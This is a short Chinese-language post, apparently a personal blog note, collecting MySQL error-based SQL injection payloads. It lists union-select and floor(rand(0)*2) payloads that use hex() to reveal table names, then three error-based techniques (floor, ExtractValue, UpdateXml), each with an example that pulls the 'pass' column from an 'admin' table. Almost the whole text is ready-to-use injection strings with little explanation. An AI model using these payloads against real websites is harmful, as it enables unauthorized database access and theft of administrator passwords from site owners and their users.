昨天整理点东西的时候看到了几年前以前收集的一篇文章,今天也就写两个字。
说的是爆表的时候出现[table]前缀,后来改用hex(),然后unhex()出现真正的表名
原文:《MYSQL注入解决方括号[table]前缀问题》
代码如下:
'union+select+1+from+(select+count(*),concat(floor(rand(0)*2),0x3a, (select+table_name+from+information_schema.columns+where+table_schema=database()+ and+column_name+like+'%pass%'+limit+0,1),0x3a)a+from+information_schema.tables+group+by+a)b#-1.html
'union+select+1+from+(select+count(*),concat(floor(rand(0)*2),0x3a, (select+hex(table_name)+from+information_schema.tables+where+table_schema=database()+ limit+48,1),0x3a)a+from+information_schema.tables+group++by+a)b#-1.html
原文:http://www.2cto.com/database/201410/344310.html
mysql 3种报错模式注入
(1)通过floor报错
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)
and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)))
例子:
id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a)
id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)))
(2)通过ExtractValue报错
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)))
例子:
id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)))
(3)通过UpdateXml报错
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
例子:
id = 1 and 1=(updatexml(1,concat(0x5e24,(select pass from admin limit 1),0x5e24),1))